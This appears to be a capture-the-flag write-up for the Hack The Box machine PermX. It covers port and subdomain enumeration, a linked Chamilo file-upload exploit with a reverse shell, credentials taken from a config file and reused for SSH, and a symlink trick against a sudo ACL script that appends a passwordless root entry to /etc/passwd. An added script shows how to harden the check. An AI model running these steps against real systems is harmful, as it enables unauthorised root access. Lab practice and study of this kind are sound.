HTB PermX machine notes

Posted by Ling-X5 on 2024-08-11

PermX machine notes

Overview

PermX is an easy HTB box. It mainly tests the tester's information-gathering skills: only with fast enumeration can you get its flags quickly.

Overall it is a fairly easy box.

Machine link: https://app.hackthebox.com/machines/PermX

1. Nmap scan

1) Port scan
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.4s latency).
Not shown: 65495 filtered tcp ports (no-response), 38 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Aug  6 09:44:09 2024 -- 1 IP address (1 host up) scanned in 327.15 seconds

2) Detailed service scan
nmap -sT -sV -sC -O -p22,80 -o detail 10.10.11.23
Nmap scan report for 10.10.11.23
Host is up (2.7s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e25c5d8c473ed872f7b4800349866def (ECDSA)
|_  256 1f41028e6b17189ca0ac5423e9713017 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 5.4 (93%), Linux 3.8 (92%), QNAP QTS 4.0 - 4.2 (92%), Linux 5.3 - 5.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  6 09:57:53 2024 -- 1 IP address (1 host up) scanned in 133.37 seconds

We see `http-title: Did not follow redirect to http://permx.htb`.

So we bind the domain name in the /etc/hosts file:

sudo vi /etc/hosts


and add the line 10.10.11.23 permx.htb.

2. Visiting the web site

http://permx.htb

Start brute-forcing subdomains:

sudo gobuster dns -d permx.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[sudo] kali 的密碼:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     permx.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: lms.permx.htb

Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================

The result shows lms.permx.htb.

Add it to /etc/hosts in the same way and open it in a browser.

A login page, probably a CMS. Search online for any public vulnerability information, and meanwhile run directory brute-forcing to see whether any pages leak information.

1) Directory brute-force
sudo gobuster dir -u http://lms.permx.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://lms.permx.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/main                 (Status: 301) [Size: 313] [--> http://lms.permx.htb/main/]
/web                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/web/]
/documentation        (Status: 301) [Size: 322] [--> http://lms.permx.htb/documentation/]
/bin                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/bin/]
/src                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/src/]
/app                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/app/]
/vendor               (Status: 301) [Size: 315] [--> http://lms.permx.htb/vendor/]
/LICENSE              (Status: 200) [Size: 35147]
/plugin               (Status: 301) [Size: 315] [--> http://lms.permx.htb/plugin/]
/certificates         (Status: 301) [Size: 321] [--> http://lms.permx.htb/certificates/]
Progress: 39913 / 220561 (18.10%)
/custompages          (Status: 301) [Size: 320] [--> http://lms.permx.htb/custompages/]
/server-status        (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

No particularly useful paths were leaked either.

2) CVE search

We found a file-upload vulnerability, CVE-2023-4220.

Exploit: https://github.com/Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit

PHP reverse shell: https://pentestmonkey.net/tools/web-shells/php-reverse-shell

3. Getting a foothold

Download both files.


Edit the IP address and port in reverse.php.


chmod +x chamilo-exp.sh 


Foothold obtained.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-color # so that clear can be used to clear the screen

Under the home directory we find the user mtz.


4. Getting the mtz user

find / -name configuration.php 2> /dev/null


We found Chamilo's configuration files; let's open them.

cat /var/www/chamilo/app/config/configuration.php    
cat /var/www/chamilo/plugin/sepe/src/configuration.php

In the configuration file under the app directory we see the database username and password.


Connect to the database:

mysql -u chamilo -p03F6lY3uXAP2bkW8


We are in the database.


Here we have the admin user and its password hash.

We tried cracking the hash with hashcat and similar tools, but got nothing.

Let's think: could the database password 03F6lY3uXAP2bkW8 also be the SSH password of the user mtz? Let's try.

sudo ssh mtz@10.10.11.23

03F6lY3uXAP2bkW8


We find the user flag.

5. Privilege escalation to root

sudo -l shows a script:


#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

Since the file is not writable, all we can do is audit the script and see whether it can be used to escalate privileges.

It blocks some malicious operations, but the checks only look at the path string, so we can try a symlink.

mtz@permx:~:$ touch test
mtz@permx:~:$ ln -sf /etc/passwd /home/mtz/test
mtz@permx:~:$ sudo /opt/acl.sh mtz rw /home/mtz/test
mtz@permx:~:$ echo "lingx5::0:0:lingx5:/root:/bin/bash" >> ./test
mtz@permx:~:$ su lingx5

root@permx:/home/mtz:#
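As an added example (not the box's /opt/acl.sh and not from the original writeup), here is how the script's target check could be hardened against the symlink trick shown above: symlinks are refused outright and the canonical path is re-checked against the allowed directory. The directory is passed as a parameter so the check can be exercised against a scratch directory, and GNU realpath is assumed to be available.

```shell
#!/bin/sh
# Added example, not the machine's /opt/acl.sh: a hardened target check.
# The writeup's bypass works because the original script only inspects the
# path string and "-f" follows symlinks, so /home/mtz/test can stand in for
# /etc/passwd. ROOT is a parameter; GNU realpath is assumed to exist.

# validate_target ROOT TARGET
# Returns 0 when TARGET is a regular, non-symlink file whose canonical path
# stays under ROOT; otherwise prints the reason on stderr and returns 1.
validate_target() {
    root="$1"; target="$2"

    # Same string checks as the audited script: prefix and no "..".
    case "$target" in
        "$root"/*) ;;
        *) echo "Access denied." >&2; return 1 ;;
    esac
    case "$target" in
        *..*) echo "Access denied." >&2; return 1 ;;
    esac

    # Refuse symlinks outright; "-f" alone would follow them.
    if [ -L "$target" ]; then
        echo "Symlinks are not allowed." >&2; return 1
    fi
    if [ ! -f "$target" ]; then
        echo "Target must be a file." >&2; return 1
    fi

    # Canonicalise every component (catches a symlinked parent directory,
    # which "-L" on the leaf does not) and re-check the prefix.
    real=$(realpath -e -- "$target") || return 1
    case "$real" in
        "$root"/*) return 0 ;;
        *) echo "Target resolves outside $root." >&2; return 1 ;;
    esac
}

# Self-contained demo: a temporary directory stands in for /home/mtz.
demo() {
    home=$(mktemp -d)
    touch "$home/plain"
    ln -sf /etc/passwd "$home/test"     # the writeup's symlink
    ln -sfn /etc "$home/linkdir"        # symlinked parent directory
    validate_target "$home" "$home/plain" && echo "plain file: allowed"
    validate_target "$home" "$home/test" || echo "symlink: denied"
    validate_target "$home" "$home/linkdir/passwd" || echo "symlinked dir: denied"
    rm -rf "$home"
}
demo
```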


We get the root flag.

Summary

  1. An nmap scan showed that the target runs HTTP and SSH. Enumerating subdomains of the HTTP service, we found a sibling site built on a CMS.
  2. On GitHub we found CVE-2023-4220 for the Chamilo framework; following the instructions on GitHub to run the exploit, we obtained a shell as www-data.
  3. In Chamilo's configuration file we found the MySQL database credentials and could log in to the database, but the admin password is a hash that is hard to crack.
  4. We wondered whether the MySQL and SSH passwords might be reused (the same password for both). We found the user mtz under home, tried SSH, and got access as mtz.
  5. In mtz's sudo list we saw /opt/acl.sh. Auditing the shell script, we found that it can grant permissions on files under /home/mtz/*, so we used a symlink to obtain write access to /etc/passwd and escalated to root.